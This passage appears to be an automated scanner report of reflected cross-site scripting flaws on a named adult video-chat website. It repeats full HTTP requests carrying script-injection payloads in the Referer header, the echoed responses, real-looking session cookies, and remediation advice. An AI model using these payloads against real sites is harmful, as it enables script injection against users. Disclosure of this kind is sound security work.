Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=5eb49'><script>alert(1)</script>a0a4a130032
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:15 GMT
Connection: close
Content-Length: 14451
Vary: Accept-Encoding
<HTML> <HEAD> <title>Customer Service - Live Video Chat at ImLive</title> <meta name="description" content="You are very important to us, and we strive to provide you with world class custom ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/help/guide/guide.asp&lr=1107816009&ud=0&pe=help/guide/guide.asp&rf=http://www.google.com/search?hl=en^q=5eb49'><script>alert(1)</script>a0a4a130032&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d32e'><script>alert(1)</script>90577f18320 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /disclaimer.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=3d32e'><script>alert(1)</script>90577f18320
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:51 GMT
Connection: close
Content-Length: 78924
Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1365d'-alert(1)-'8c7ad16a976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forgot.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=1365d'-alert(1)-'8c7ad16a976
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:38 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31f'-alert(1)-'d8c094b7adb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forgot.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=9f31f'-alert(1)-'d8c094b7adb
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:47 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3d10'><script>alert(1)</script>76788ffdb68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
Referer: http://www.google.com/search?hl=en&q=e3d10'><script>alert(1)</script>76788ffdb68
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39448'><script>alert(1)</script>4985a3648d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hostmembers.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=39448'><script>alert(1)</script>4985a3648d9
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:16 GMT
Connection: close
Content-Length: 10795
Vary: Accept-Encoding
<HTML> <HEAD>
<TITLE>ImLive - Host Login</TITLE>
<meta name="description" content="Welcome, ImLive Hosts. Please login to live video chat about everything from friendship and romance ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/login.asp?host&lr=1107816009&ud=0&pe=login.asp&rf=http://www.google.com/search?hl=en^q=39448'><script>alert(1)</script>4985a3648d9&qs=host&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9543d'-alert(1)-'3fbf0fbae6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9543d'-alert(1)-'3fbf0fbae6a
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:05 GMT
Connection: close
Content-Length: 39949
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/&rf=http://www.google.com/search?hl=en^q=9543d'-alert(1)-'3fbf0fbae6a&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2e5'-alert(1)-'83f3da1d0da was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/adult-shows/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=dd2e5'-alert(1)-'83f3da1d0da
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:41 GMT
Connection: close
Content-Length: 25196
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... "text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/&rf=http://www.google.com/search?hl=en^q=dd2e5'-alert(1)-'83f3da1d0da&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50e28'-alert(1)-'4ef9bdb79a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=50e28'-alert(1)-'4ef9bdb79a0
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:23 GMT
Connection: close
Content-Length: 224507
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=50e28'-alert(1)-'4ef9bdb79a0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c00'-alert(1)-'13ed03de9eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=15c00'-alert(1)-'13ed03de9eb
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
